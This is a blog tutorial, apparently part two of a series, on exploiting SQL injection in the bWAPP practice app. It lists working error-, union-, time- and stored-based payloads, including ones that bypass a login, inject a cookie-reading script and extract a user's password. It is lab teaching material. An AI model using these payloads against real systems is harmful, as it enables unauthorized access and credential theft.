SQL Injections – Part 2


As you already familiar with the subject SQL injections from the previous article part 1, we will quickly dive into exploitation with SQLi. Login to your bWAPP and select vulnerability SQL Injection (Login Form/Hero). As stated in previous post, we need to do some manual analysis to know the functionality and it’s implementation. Try to login with your some random text (test, test). Now let’s do some dynamic analysis by reviewing source code of the functionality.

mm1
This constructed statement leads to SQLi vulnerability. It’s quite easy to break the statement with single quote and boolean condition which is error based sqli
Attack vector: test’ or 1=1–

mm2
You may try other type SQL injections Union based, Time based
Here’re the examples of attack
Union Based:
1) test’ UNION ALL SELECT NULL,CONCAT(0x3a6a62713a,0x427547556778516a7957,0x3a6e6b6c3a),NULL,NULL#
2) test’ union select 1,1,1,1–
3) test’ union select 1,’IronMan’,1,’You are hacked!’–
4) test’ union select 1,’IronMan’,1,’alert(document.cookie)Hacked!’–

mm3

mm4

Time Based:
1) test’ / sleep(15) / ‘
2) test’ AND (SELECT * FROM (SELECT(SLEEP(5)))rGVc) AND ‘Wnfm’=’Wnfm

Now let’s break another functionality, select SQL Injection – Stored (Blog) in bWAPP
Again do the analysis, check the source code to know the implementation.

sb2.png

Okay, now it’s an Insert statement being used. So, the malicious input would also gets stored in the database. Try inserting a single quote

sb1

So try all types of SQL injections (Error based, Union based, Time based). If you’re vexed up doing this manually then use Burp Repeater to resend the request or ZAP, SQLMap for automated scan of this request.
Attacks:
1) blah’,(select password from heroes where login=’neo’))–
2) Yo yo ‘ / sleep(15) / ‘
3) Yo yo ‘ AND (SELECT 3335 FROM(SELECT COUNT(*),CONCAT(0x3a6a62713a,(SELECT (ELT(3335=3335,1))),0x3a6e6b6c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘dIgi’=’dIgi

Try all other functionalities in bWAPP. I hope now you’ve a good understanding on SQL injections. I’ll post cheat sheet soon. If you think that I miss anything then please post a comment below.

Here’s the reference: https://www.owasp.org/index.php/SQL_Injection
How to review the source code: https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s